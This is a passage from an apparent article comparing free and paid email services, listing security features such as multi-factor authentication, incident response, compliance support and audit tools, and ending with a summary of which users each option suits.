    • Two-Factor Authentication (2FA): While free services offer 2FA, paid services often provide more robust and customizable authentication options, including multi-factor authentication (MFA).
  4. Dedicated Support and Incident Response:
    • Priority Support: Paid services typically offer 24/7 customer support with dedicated security experts who can quickly address and resolve security issues.
    • Incident Response: Faster response times and professional incident response teams are available to handle security breaches, ensuring minimal disruption.
  5. Compliance and Legal Protections:
    • Regulatory Compliance: Paid services often provide features and support to ensure compliance with various regulations such as GDPR, HIPAA, etc. This is crucial for businesses handling sensitive or regulated data.
    • Audit and Monitoring: Enhanced monitoring and auditing tools are available to track and respond to suspicious activities.

Summary

The choice is yours and depends on your specific needs. Free email services are suitable for personal use, casual communication, and users who don’t require advanced features or high levels of privacy. Paid email services are ideal for businesses, professionals, and users who prioritize privacy, custom domain usage, advanced features, and robust customer support.